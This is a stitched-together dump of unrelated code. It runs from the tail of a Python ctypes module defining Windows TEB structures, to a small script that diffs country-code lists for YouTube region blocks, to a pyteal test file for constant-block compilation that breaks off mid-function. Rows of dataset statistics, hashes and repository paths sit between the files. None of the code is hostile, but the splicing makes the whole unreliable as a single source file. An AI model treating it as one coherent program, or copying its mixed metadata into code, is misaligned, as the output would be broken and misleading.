# +0x2e8 TxFsContext : Uint4B
# +0x2f0 GdiTebBatch : _GDI_TEB_BATCH
# +0x7d8 RealClientId : _CLIENT_ID
# +0x7e8 GdiCachedProcessHandle : Ptr64 Void
# +0x7f0 GdiClientPID : Uint4B
# +0x7f4 GdiClientTID : Uint4B
# +0x7f8 GdiThreadLocalInfo : Ptr64 Void
# +0x800 Win32ClientInfo : [62] Uint8B
# +0x9f0 glDispatchTable : [233] Ptr64 Void
# +0x1138 glReserved1 : [29] Uint8B
# +0x1220 glReserved2 : Ptr64 Void
# +0x1228 glSectionInfo : Ptr64 Void
# +0x1230 glSection : Ptr64 Void
# +0x1238 glTable : Ptr64 Void
# +0x1240 glCurrentRC : Ptr64 Void
# +0x1248 glContext : Ptr64 Void
# +0x1250 LastStatusValue : Uint4B
# +0x1258 StaticUnicodeString : _UNICODE_STRING
# +0x1268 StaticUnicodeBuffer : [261] Wchar
# +0x1478 DeallocationStack : Ptr64 Void
# +0x1480 TlsSlots : [64] Ptr64 Void
# +0x1680 TlsLinks : _LIST_ENTRY
# +0x1690 Vdm : Ptr64 Void
# +0x1698 ReservedForNtRpc : Ptr64 Void
# +0x16a0 DbgSsReserved : [2] Ptr64 Void
# +0x16b0 HardErrorMode : Uint4B
# +0x16b8 Instrumentation : [11] Ptr64 Void
# +0x1710 ActivityId : _GUID
# +0x1720 SubProcessTag : Ptr64 Void
# +0x1728 EtwLocalData : Ptr64 Void
# +0x1730 EtwTraceData : Ptr64 Void
# +0x1738 WinSockData : Ptr64 Void
# +0x1740 GdiBatchCount : Uint4B
# +0x1744 CurrentIdealProcessor : _PROCESSOR_NUMBER
# +0x1744 IdealProcessorValue : Uint4B
# +0x1744 ReservedPad0 : UChar
# +0x1745 ReservedPad1 : UChar
# +0x1746 ReservedPad2 : UChar
# +0x1747 IdealProcessor : UChar
# +0x1748 GuaranteedStackBytes : Uint4B
# +0x1750 ReservedForPerf : Ptr64 Void
# +0x1758 ReservedForOle : Ptr64 Void
# +0x1760 WaitingOnLoaderLock : Uint4B
# +0x1768 SavedPriorityState : Ptr64 Void
# +0x1770 SoftPatchPtr1 : Uint8B
# +0x1778 ThreadPoolData : Ptr64 Void
# +0x1780 TlsExpansionSlots : Ptr64 Ptr64 Void
# +0x1788 DeallocationBStore : Ptr64 Void
# +0x1790 BStoreLimit : Ptr64 Void
# +0x1798 MuiGeneration : Uint4B
# +0x179c IsImpersonating : Uint4B
# +0x17a0 NlsCache : Ptr64 Void
# +0x17a8 pShimData : Ptr64 Void
# +0x17b0 HeapVirtualAffinity : Uint4B
# +0x17b8 CurrentTransactionHandle : Ptr64 Void
# +0x17c0 ActiveFrame : Ptr64 _TEB_ACTIVE_FRAME
# +0x17c8 FlsData : Ptr64 Void
# +0x17d0 PreferredLanguages : Ptr64 Void
# +0x17d8 UserPrefLanguages : Ptr64 Void
# +0x17e0 MergedPrefLanguages : Ptr64 Void
# +0x17e8 MuiImpersonation : Uint4B
# +0x17ec CrossTebFlags : Uint2B
# +0x17ec SpareCrossTebBits : Pos 0, 16 Bits
# +0x17ee SameTebFlags : Uint2B
# +0x17ee SafeThunkCall : Pos 0, 1 Bit
# +0x17ee InDebugPrint : Pos 1, 1 Bit
# +0x17ee HasFiberData : Pos 2, 1 Bit
# +0x17ee SkipThreadAttach : Pos 3, 1 Bit
# +0x17ee WerInShipAssertCode : Pos 4, 1 Bit
# +0x17ee RanProcessInit : Pos 5, 1 Bit
# +0x17ee ClonedThread : Pos 6, 1 Bit
# +0x17ee SuppressDebugMsg : Pos 7, 1 Bit
# +0x17ee DisableUserStackWalk : Pos 8, 1 Bit
# +0x17ee RtlExceptionAttached : Pos 9, 1 Bit
# +0x17ee InitialThread : Pos 10, 1 Bit
# +0x17ee SpareSameTebBits : Pos 11, 5 Bits
# +0x17f0 TxnScopeEnterCallback : Ptr64 Void
# +0x17f8 TxnScopeExitCallback : Ptr64 Void
# +0x1800 TxnScopeContext : Ptr64 Void
# +0x1808 LockCount : Uint4B
# +0x180c SpareUlong0 : Uint4B
# +0x1810 ResourceRetValue : Ptr64 Void
class _TEB_2008_R2_64(Structure):
_pack_ = 8
_fields_ = [
("NtTib", NT_TIB),
("EnvironmentPointer", PVOID),
("ClientId", CLIENT_ID),
("ActiveRpcHandle", HANDLE),
("ThreadLocalStoragePointer", PVOID),
("ProcessEnvironmentBlock", PVOID), # PPEB
("LastErrorValue", DWORD),
("CountOfOwnedCriticalSections", DWORD),
("CsrClientThread", PVOID),
("Win32ThreadInfo", PVOID),
("User32Reserved", DWORD * 26),
("UserReserved", DWORD * 5),
("WOW32Reserved", PVOID), # ptr to wow64cpu!X86SwitchTo64BitMode
("CurrentLocale", DWORD),
("FpSoftwareStatusRegister", DWORD),
("SystemReserved1", PVOID * 54),
("ExceptionCode", SDWORD),
("ActivationContextStackPointer", PVOID), # PACTIVATION_CONTEXT_STACK
("SpareBytes", UCHAR * 24),
("TxFsContext", DWORD),
("GdiTebBatch", GDI_TEB_BATCH),
("RealClientId", CLIENT_ID),
("GdiCachedProcessHandle", HANDLE),
("GdiClientPID", DWORD),
("GdiClientTID", DWORD),
("GdiThreadLocalInfo", PVOID),
("Win32ClientInfo", DWORD * 62),
("glDispatchTable", PVOID * 233),
("glReserved1", QWORD * 29),
("glReserved2", PVOID),
("glSectionInfo", PVOID),
("glSection", PVOID),
("glTable", PVOID),
("glCurrentRC", PVOID),
("glContext", PVOID),
("LastStatusValue", NTSTATUS),
("StaticUnicodeString", UNICODE_STRING),
("StaticUnicodeBuffer", WCHAR * 261),
("DeallocationStack", PVOID),
("TlsSlots", PVOID * 64),
("TlsLinks", LIST_ENTRY),
("Vdm", PVOID),
("ReservedForNtRpc", PVOID),
("DbgSsReserved", PVOID * 2),
("HardErrorMode", DWORD),
("Instrumentation", PVOID * 11),
("ActivityId", GUID),
("SubProcessTag", PVOID),
("EtwLocalData", PVOID),
("EtwTraceData", PVOID),
("WinSockData", PVOID),
("GdiBatchCount", DWORD),
("CurrentIdealProcessor", PROCESSOR_NUMBER),
("IdealProcessorValue", DWORD),
("ReservedPad0", UCHAR),
("ReservedPad1", UCHAR),
("ReservedPad2", UCHAR),
("IdealProcessor", UCHAR),
("GuaranteedStackBytes", DWORD),
("ReservedForPerf", PVOID),
("ReservedForOle", PVOID),
("WaitingOnLoaderLock", DWORD),
("SavedPriorityState", PVOID),
("SoftPatchPtr1", PVOID),
("ThreadPoolData", PVOID),
("TlsExpansionSlots", PVOID), # Ptr64 Ptr64 Void
("DeallocationBStore", PVOID),
("BStoreLimit", PVOID),
("MuiGeneration", DWORD),
("IsImpersonating", BOOL),
("NlsCache", PVOID),
("pShimData", PVOID),
("HeapVirtualAffinity", DWORD),
("CurrentTransactionHandle", HANDLE),
("ActiveFrame", PVOID), # PTEB_ACTIVE_FRAME
("FlsData", PVOID),
("PreferredLanguages", PVOID),
("UserPrefLanguages", PVOID),
("MergedPrefLanguages", PVOID),
("MuiImpersonation", BOOL),
("CrossTebFlags", WORD),
("SameTebFlags", WORD),
("TxnScopeEnterCallback", PVOID),
("TxnScopeExitCallback", PVOID),
("TxnScopeContext", PVOID),
("LockCount", DWORD),
("SpareUlong0", ULONG),
("ResourceRetValue", PVOID),
]
_TEB_Vista = _TEB_2008
_TEB_Vista_64 = _TEB_2008_64
_TEB_W7 = _TEB_2008_R2
_TEB_W7_64 = _TEB_2008_R2_64
# Use the correct TEB structure definition.
# Defaults to the latest Windows version.
class TEB(Structure):
_pack_ = 8
if os == 'Windows NT':
_pack_ = _TEB_NT._pack_
_fields_ = _TEB_NT._fields_
elif os == 'Windows 2000':
_pack_ = _TEB_2000._pack_
_fields_ = _TEB_2000._fields_
elif os == 'Windows XP':
_fields_ = _TEB_XP._fields_
elif os == 'Windows XP (64 bits)':
_fields_ = _TEB_XP_64._fields_
elif os == 'Windows 2003':
_fields_ = _TEB_2003._fields_
elif os == 'Windows 2003 (64 bits)':
_fields_ = _TEB_2003_64._fields_
elif os == 'Windows 2008':
_fields_ = _TEB_2008._fields_
elif os == 'Windows 2008 (64 bits)':
_fields_ = _TEB_2008_64._fields_
elif os == 'Windows 2003 R2':
_fields_ = _TEB_2003_R2._fields_
elif os == 'Windows 2003 R2 (64 bits)':
_fields_ = _TEB_2003_R2_64._fields_
elif os == 'Windows 2008 R2':
_fields_ = _TEB_2008_R2._fields_
elif os == 'Windows 2008 R2 (64 bits)':
_fields_ = _TEB_2008_R2_64._fields_
elif os == 'Windows Vista':
_fields_ = _TEB_Vista._fields_
elif os == 'Windows Vista (64 bits)':
_fields_ = _TEB_Vista_64._fields_
elif os == 'Windows 7':
_fields_ = _TEB_W7._fields_
elif os == 'Windows 7 (64 bits)':
_fields_ = _TEB_W7_64._fields_
elif sizeof(SIZE_T) == sizeof(DWORD):
_fields_ = _TEB_W7._fields_
else:
_fields_ = _TEB_W7_64._fields_
PTEB = POINTER(TEB)
#==============================================================================
# This calculates the list of exported symbols.
_all = set(vars().keys()).difference(_all)
__all__ = [_x for _x in _all if not _x.startswith('_')]
__all__.sort()
#==============================================================================
| 47.341385 | 118 | 0.528067 | 11,318 | 162,665 | 7.414738 | 0.094363 | 0.031959 | 0.005291 | 0.007019 | 0.835224 | 0.805088 | 0.793244 | 0.783961 | 0.768363 | 0.753682 | 0 | 0.081101 | 0.378502 | 162,665 | 3,435 | 119 | 47.355167 | 0.749001 | 0.43967 | 0 | 0.799054 | 0 | 0 | 0.24196 | 0.063959 | 0 | 0 | 0.003615 | 0.000291 | 0.003546 | 1 | 0.008274 | false | 0.004728 | 0.001182 | 0.004137 | 0.072695 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d9b38552cd43d53bd3aa29f0f9f6852e48aeb97a | 1,998 | py | Python | youtubeAntiBlock.py | Patrolin/scripts | 52b0b7e027d088c51a5c7c625f25dc0757f49f60 | [
"Unlicense"
] | null | null | null | youtubeAntiBlock.py | Patrolin/scripts | 52b0b7e027d088c51a5c7c625f25dc0757f49f60 | [
"Unlicense"
] | 8 | 2020-10-21T12:34:40.000Z | 2021-09-12T14:01:54.000Z | youtubeAntiBlock.py | Patrolin/scripts | 52b0b7e027d088c51a5c7c625f25dc0757f49f60 | [
"Unlicense"
] | null | null | null | # a = [...document.querySelectorAll('table')[0].querySelectorAll('td:nth-child(8n+4)')].map(e => e.innerText);
# console.log(''+a);
# https://en.wikipedia.org/wiki/List_of_ISO_3166_country_codes
countries = '''AF,AD,AE,AG,AI,AL,AM,AO,AQ,AR,AS,AT,AU,AW,AX,AZ,BA,BB,BD,BE,BF,BG,BH,BI,BJ,BL,BM,BN,BO,BQ,BR,BS,BT,BV,BW,BY,BZ,CA,CC,CD,CF,CG,CH,CI,CK,CL,CM,CN,CO,CR,CU,CV,CW,CX,CY,CZ,DE,DJ,DK,DM,DO,DZ,EC,EE,EG,EH,ER,ES,ET,FI,FJ,FK,FM,FO,FR,GA,GB,GD,GE,GF,GG,GH,GI,GL,GM,GN,GP,GQ,GR,GS,GT,GU,GW,GY,HK,HM,HN,HR,HT,HU,ID,IE,IL,IM,IN,IO,IQ,IR,IS,IT,JE,JM,JO,JP,KE,KG,KH,KI,KM,KN,KP,KR,KW,KY,KZ,LA,LB,LC,LI,LK,LR,LS,LT,LU,LV,LY,MA,MC,MD,ME,MF,MG,MH,MK,ML,MM,MN,MO,MP,MQ,MR,MS,MT,MU,MV,MW,MX,MY,MZ,NA,NC,NE,NF,NG,NI,NL,NO,NP,NR,NU,NZ,OM,PA,PE,PF,PG,PH,PK,PL,PM,PN,PR,PS,PT,PW,PY,QA,RE,RO,RS,RU,RW,SA,SB,SC,SD,SE,SG,SH,SI,SJ,SK,SL,SM,SN,SO,SR,SS,ST,SV,SX,SY,SZ,TC,TD,TF,TG,TH,TJ,TK,TL,TM,TN,TO,TR,TT,TV,TW,TZ,UA,UG,UM,US,UY,UZ,VA,VC,VE,VG,VI,VN,VU,WF,WS,YE,YT,ZA,ZM,ZW'''
# a = [...document.querySelectorAll('table')[0].querySelectorAll('td:nth-child(2n+2)')].map(e => e.innerText);
# console.log(''+a);
# https://polsy.org.uk/stuff/ytrestrict.cgi
blocked = '''AD,AE,AF,AG,AI,AL,AM,AO,AQ,AR,AS,AT,AU,AW,AX,AZ,BA,BB,BD,BE,BF,BG,BH,BI,BJ,BL,BM,BN,BO,BQ,BR,BS,BT,BV,BW,BY,BZ,CA,CC,CD,CF,CG,CH,CI,CK,CL,CM,CN,CO,CR,CU,CV,CW,CX,CY,CZ,DE,DJ,DK,DM,DO,DZ,EC,EE,EG,EH,ER,ES,ET,FI,FJ,FK,FM,FO,FR,GA,GB,GD,GE,GF,GG,GH,GI,GL,GM,GN,GP,GQ,GR,GS,GT,GU,GW,GY,HK,HM,HN,HR,HT,HU,ID,IE,IL,IM,IN,IO,IQ,IR,IS,IT,JE,JM,JO,JP,KE,KG,KH,KI,KM,KN,KP,KR,KW,KY,KZ,LA,LB,LC,LI,LK,LR,LS,LT,LU,LV,LY,MA,MC,MD,ME,MF,MG,MH,MK,ML,MM,MN,MO,MP,MQ,MR,MS,MT,MU,MV,MW,MX,MY,MZ,NA,NC,NE,NF,NG,NI,NL,NO,NP,NR,NU,NZ,OM,PA,PE,PF,PG,PH,PK,PL,PM,PN,PR,PS,PT,PW,PY,QA,RE,RO,RS,RU,RW,SA,SB,SC,SD,SE,SG,SH,SI,SJ,SK,SL,SM,SN,SO,SR,SS,ST,SV,SX,SY,SZ,TC,TD,TF,TG,TH,TJ,TK,TL,TM,TN,TO,TR,TT,TV,TW,TZ,UA,UG,UM,US,UY,UZ,VA,VC,VE,VG,VI,VN,VU,WF,WS,YE,YT,ZA,ZM,ZW'''
def asSet(x: str) -> set:
return set(x.split(','))
print(asSet(countries) - asSet(blocked))
| 117.529412 | 764 | 0.665165 | 568 | 1,998 | 2.330986 | 0.512324 | 0.013595 | 0.037764 | 0.045317 | 0.874622 | 0.874622 | 0.874622 | 0.874622 | 0.829305 | 0.743202 | 0 | 0.005115 | 0.021522 | 1,998 | 16 | 765 | 124.875 | 0.672123 | 0.179179 | 0 | 0 | 0 | 0.4 | 0.914268 | 0.913656 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0.2 | 0.4 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 11 |
d9c3a2b4b2960b73970e2b3363b8c498b5df1c7c | 21,113 | py | Python | pyteal/compiler/constants_test.py | MikeOwino/pyteal | 4ec401fd258d1f9075d2d057408ca58bfa72f67d | [
"MIT"
] | null | null | null | pyteal/compiler/constants_test.py | MikeOwino/pyteal | 4ec401fd258d1f9075d2d057408ca58bfa72f67d | [
"MIT"
] | null | null | null | pyteal/compiler/constants_test.py | MikeOwino/pyteal | 4ec401fd258d1f9075d2d057408ca58bfa72f67d | [
"MIT"
] | null | null | null | from .. import *
from .constants import (
extractIntValue,
extractBytesValue,
extractAddrValue,
createConstantBlocks,
extractMethodSigValue,
)
def test_extractIntValue():
tests = [
(TealOp(None, Op.int, 0), 0),
(TealOp(None, Op.int, 5), 5),
(TealOp(None, Op.int, "pay"), 1),
(TealOp(None, Op.int, "NoOp"), 0),
(TealOp(None, Op.int, "UpdateApplication"), 4),
(TealOp(None, Op.int, "TMPL_NAME"), "TMPL_NAME"),
]
for op, expected in tests:
actual = extractIntValue(op)
assert actual == expected
def test_extractBytesValue():
tests = [
(TealOp(None, Op.byte, '""'), b""),
(TealOp(None, Op.byte, '"test"'), b"test"),
(TealOp(None, Op.byte, '"\\t\\n\\\\\\""'), b'\t\n\\"'),
(TealOp(None, Op.byte, "0x"), b""),
(TealOp(None, Op.byte, "0x00"), b"\x00"),
(TealOp(None, Op.byte, "0xFF00"), b"\xff\x00"),
(TealOp(None, Op.byte, "0xff00"), b"\xff\x00"),
(TealOp(None, Op.byte, "base32()"), b""),
(TealOp(None, Op.byte, "base32(ORSXG5A)"), b"test"),
(TealOp(None, Op.byte, "base32(ORSXG5A=)"), b"test"),
(TealOp(None, Op.byte, "base64()"), b""),
(TealOp(None, Op.byte, "base64(dGVzdA==)"), b"test"),
(TealOp(None, Op.byte, "TMPL_NAME"), "TMPL_NAME"),
]
for op, expected in tests:
actual = extractBytesValue(op)
assert actual == expected
def test_extractAddrValue():
tests = [
(
TealOp(
None,
Op.byte,
"WSJHNPJ6YCLX5K4GUMQ4ISPK3ABMS3AL3F6CSVQTCUI5F4I65PWEMCWT3M",
),
b"\xb4\x92v\xbd>\xc0\x97~\xab\x86\xa3!\xc4I\xea\xd8\x02\xc9l\x0b\xd9|)V\x13\x15\x11\xd2\xf1\x1e\xeb\xec",
),
(TealOp(None, Op.addr, "TMPL_NAME"), "TMPL_NAME"),
]
for op, expected in tests:
actual = extractAddrValue(op)
assert actual == expected
# test case came from: https://gist.github.com/jasonpaulos/99e4f8a75f2fc2ec9b8073c064530359
def test_extractMethodValue():
tests = [
(
TealOp(None, Op.method_signature, '"create(uint64)uint64"'),
b"\x43\x46\x41\x01",
),
(TealOp(None, Op.method_signature, '"update()void"'), b"\xa0\xe8\x18\x72"),
(
TealOp(None, Op.method_signature, '"optIn(string)string"'),
b"\xcf\xa6\x8e\x36",
),
(TealOp(None, Op.method_signature, '"closeOut()string"'), b"\xa9\xf4\x2b\x3d"),
(TealOp(None, Op.method_signature, '"delete()void"'), b"\x24\x37\x8d\x3c"),
(
TealOp(None, Op.method_signature, '"add(uint64,uint64)uint64"'),
b"\xfe\x6b\xdf\x69",
),
(TealOp(None, Op.method_signature, '"empty()void"'), b"\xa8\x8c\x26\xa5"),
(
TealOp(None, Op.method_signature, '"payment(pay,uint64)bool"'),
b"\x3e\x3b\x3d\x28",
),
(
TealOp(
None,
Op.method_signature,
'"referenceTest(account,application,account,asset,account,asset,asset,application,application)uint8[9]"',
),
b"\x0d\xf0\x05\x0f",
),
]
for op, expected in tests:
actual = extractMethodSigValue(op)
assert actual == expected
def test_createConstantBlocks_empty():
ops = []
expected = ops[:]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_no_consts():
ops = [
TealOp(None, Op.txn, "Sender"),
TealOp(None, Op.txn, "Receiver"),
TealOp(None, Op.eq),
]
expected = ops[:]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_pushint():
ops = [
TealOp(None, Op.int, 0),
TealOp(None, Op.int, "OptIn"),
TealOp(None, Op.add),
]
expected = [
TealOp(None, Op.pushint, 0, "//", 0),
TealOp(None, Op.pushint, 1, "//", "OptIn"),
TealOp(None, Op.add),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_intblock_single():
ops = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, "OptIn"),
TealOp(None, Op.add),
]
expected = [
TealOp(None, Op.intcblock, 1),
TealOp(None, Op.intc_0, "//", 1),
TealOp(None, Op.intc_0, "//", "OptIn"),
TealOp(None, Op.add),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_intblock_multiple():
ops = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, "OptIn"),
TealOp(None, Op.add),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, "keyreg"),
TealOp(None, Op.add),
TealOp(None, Op.int, 3),
TealOp(None, Op.int, "ClearState"),
TealOp(None, Op.add),
]
expected = [
TealOp(None, Op.intcblock, 1, 2, 3),
TealOp(None, Op.intc_0, "//", 1),
TealOp(None, Op.intc_0, "//", "OptIn"),
TealOp(None, Op.add),
TealOp(None, Op.intc_1, "//", 2),
TealOp(None, Op.intc_1, "//", "keyreg"),
TealOp(None, Op.add),
TealOp(None, Op.intc_2, "//", 3),
TealOp(None, Op.intc_2, "//", "ClearState"),
TealOp(None, Op.add),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_intblock_pushint():
ops = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, "OptIn"),
TealOp(None, Op.add),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.add),
TealOp(None, Op.int, 3),
TealOp(None, Op.int, "ClearState"),
TealOp(None, Op.add),
]
expected = [
TealOp(None, Op.intcblock, 3, 1),
TealOp(None, Op.intc_1, "//", 1),
TealOp(None, Op.intc_1, "//", "OptIn"),
TealOp(None, Op.add),
TealOp(None, Op.pushint, 2, "//", 2),
TealOp(None, Op.intc_0, "//", 3),
TealOp(None, Op.add),
TealOp(None, Op.intc_0, "//", 3),
TealOp(None, Op.intc_0, "//", "ClearState"),
TealOp(None, Op.add),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_pushbytes():
ops = [
TealOp(None, Op.byte, "0x0102"),
TealOp(None, Op.byte, "0x0103"),
TealOp(None, Op.method_signature, '"empty()void"'),
TealOp(None, Op.concat),
]
expected = [
TealOp(None, Op.pushbytes, "0x0102", "//", "0x0102"),
TealOp(None, Op.pushbytes, "0x0103", "//", "0x0103"),
TealOp(None, Op.pushbytes, "0xa88c26a5", "//", '"empty()void"'),
TealOp(None, Op.concat),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_byteblock_single():
ops = [
TealOp(None, Op.byte, "0x0102"),
TealOp(None, Op.byte, "base64(AQI=)"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "base32(AEBA====)"),
TealOp(None, Op.concat),
]
expected = [
TealOp(None, Op.bytecblock, "0x0102"),
TealOp(None, Op.bytec_0, "//", "0x0102"),
TealOp(None, Op.bytec_0, "//", "base64(AQI=)"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_0, "//", "base32(AEBA====)"),
TealOp(None, Op.concat),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_byteblock_multiple():
ops = [
TealOp(None, Op.byte, "0x0102"),
TealOp(None, Op.byte, "base64(AQI=)"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "base32(AEBA====)"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, '"test"'),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "base32(ORSXG5A=)"),
TealOp(None, Op.concat),
TealOp(
None,
Op.byte,
"0xb49276bd3ec0977eab86a321c449ead802c96c0bd97c2956131511d2f11eebec",
),
TealOp(None, Op.concat),
TealOp(
None, Op.addr, "WSJHNPJ6YCLX5K4GUMQ4ISPK3ABMS3AL3F6CSVQTCUI5F4I65PWEMCWT3M"
),
TealOp(None, Op.concat),
TealOp(None, Op.method_signature, '"closeOut()string"'),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "base64(qfQrPQ==)"),
]
expected = [
TealOp(
None,
Op.bytecblock,
"0x0102",
"0x74657374",
"0xb49276bd3ec0977eab86a321c449ead802c96c0bd97c2956131511d2f11eebec",
"0xa9f42b3d",
),
TealOp(None, Op.bytec_0, "//", "0x0102"),
TealOp(None, Op.bytec_0, "//", "base64(AQI=)"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_0, "//", "base32(AEBA====)"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_1, "//", '"test"'),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_1, "//", "base32(ORSXG5A=)"),
TealOp(None, Op.concat),
TealOp(
None,
Op.bytec_2,
"//",
"0xb49276bd3ec0977eab86a321c449ead802c96c0bd97c2956131511d2f11eebec",
),
TealOp(None, Op.concat),
TealOp(
None,
Op.bytec_2,
"//",
"WSJHNPJ6YCLX5K4GUMQ4ISPK3ABMS3AL3F6CSVQTCUI5F4I65PWEMCWT3M",
),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_3, "//", '"closeOut()string"'),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_3, "//", "base64(qfQrPQ==)"),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_byteblock_pushbytes():
ops = [
TealOp(None, Op.byte, "0x0102"),
TealOp(None, Op.byte, "base64(AQI=)"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "base32(AEBA====)"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, '"test"'),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "base32(ORSXG5A=)"),
TealOp(None, Op.concat),
TealOp(
None, Op.addr, "WSJHNPJ6YCLX5K4GUMQ4ISPK3ABMS3AL3F6CSVQTCUI5F4I65PWEMCWT3M"
),
TealOp(None, Op.concat),
]
expected = [
TealOp(None, Op.bytecblock, "0x0102", "0x74657374"),
TealOp(None, Op.bytec_0, "//", "0x0102"),
TealOp(None, Op.bytec_0, "//", "base64(AQI=)"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_0, "//", "base32(AEBA====)"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_1, "//", '"test"'),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_1, "//", "base32(ORSXG5A=)"),
TealOp(None, Op.concat),
TealOp(
None,
Op.pushbytes,
"0xb49276bd3ec0977eab86a321c449ead802c96c0bd97c2956131511d2f11eebec",
"//",
"WSJHNPJ6YCLX5K4GUMQ4ISPK3ABMS3AL3F6CSVQTCUI5F4I65PWEMCWT3M",
),
TealOp(None, Op.concat),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_all():
ops = [
TealOp(None, Op.byte, "0x0102"),
TealOp(None, Op.byte, "base64(AQI=)"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "base32(AEBA====)"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, '"test"'),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "base32(ORSXG5A=)"),
TealOp(None, Op.concat),
TealOp(
None, Op.addr, "WSJHNPJ6YCLX5K4GUMQ4ISPK3ABMS3AL3F6CSVQTCUI5F4I65PWEMCWT3M"
),
TealOp(None, Op.concat),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, "OptIn"),
TealOp(None, Op.add),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.add),
TealOp(None, Op.int, 3),
TealOp(None, Op.int, "ClearState"),
TealOp(None, Op.add),
]
expected = [
TealOp(None, Op.intcblock, 3, 1),
TealOp(None, Op.bytecblock, "0x0102", "0x74657374"),
TealOp(None, Op.bytec_0, "//", "0x0102"),
TealOp(None, Op.bytec_0, "//", "base64(AQI=)"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_0, "//", "base32(AEBA====)"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_1, "//", '"test"'),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_1, "//", "base32(ORSXG5A=)"),
TealOp(None, Op.concat),
TealOp(
None,
Op.pushbytes,
"0xb49276bd3ec0977eab86a321c449ead802c96c0bd97c2956131511d2f11eebec",
"//",
"WSJHNPJ6YCLX5K4GUMQ4ISPK3ABMS3AL3F6CSVQTCUI5F4I65PWEMCWT3M",
),
TealOp(None, Op.concat),
TealOp(None, Op.intc_1, "//", 1),
TealOp(None, Op.intc_1, "//", "OptIn"),
TealOp(None, Op.add),
TealOp(None, Op.pushint, 2, "//", 2),
TealOp(None, Op.intc_0, "//", 3),
TealOp(None, Op.add),
TealOp(None, Op.intc_0, "//", 3),
TealOp(None, Op.intc_0, "//", "ClearState"),
TealOp(None, Op.add),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_tmpl_int():
ops = [
TealOp(None, Op.int, "TMPL_INT_1"),
TealOp(None, Op.int, "TMPL_INT_1"),
TealOp(None, Op.eq),
TealOp(None, Op.int, "TMPL_INT_2"),
TealOp(None, Op.add),
]
expected = [
TealOp(None, Op.intcblock, "TMPL_INT_1"),
TealOp(None, Op.intc_0, "//", "TMPL_INT_1"),
TealOp(None, Op.intc_0, "//", "TMPL_INT_1"),
TealOp(None, Op.eq),
TealOp(None, Op.pushint, "TMPL_INT_2", "//", "TMPL_INT_2"),
TealOp(None, Op.add),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_tmpl_int_mixed():
ops = [
TealOp(None, Op.int, "TMPL_INT_1"),
TealOp(None, Op.int, "TMPL_INT_1"),
TealOp(None, Op.eq),
TealOp(None, Op.int, "TMPL_INT_2"),
TealOp(None, Op.add),
TealOp(None, Op.int, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.add),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
]
expected = [
TealOp(None, Op.intcblock, "TMPL_INT_1", 0),
TealOp(None, Op.intc_0, "//", "TMPL_INT_1"),
TealOp(None, Op.intc_0, "//", "TMPL_INT_1"),
TealOp(None, Op.eq),
TealOp(None, Op.pushint, "TMPL_INT_2", "//", "TMPL_INT_2"),
TealOp(None, Op.add),
TealOp(None, Op.intc_1, "//", 0),
TealOp(None, Op.intc_1, "//", 0),
TealOp(None, Op.add),
TealOp(None, Op.pushint, 1, "//", 1),
TealOp(None, Op.add),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_tmpl_bytes():
ops = [
TealOp(None, Op.byte, "TMPL_BYTES_1"),
TealOp(None, Op.byte, "TMPL_BYTES_1"),
TealOp(None, Op.eq),
TealOp(None, Op.byte, "TMPL_BYTES_2"),
TealOp(None, Op.concat),
]
expected = [
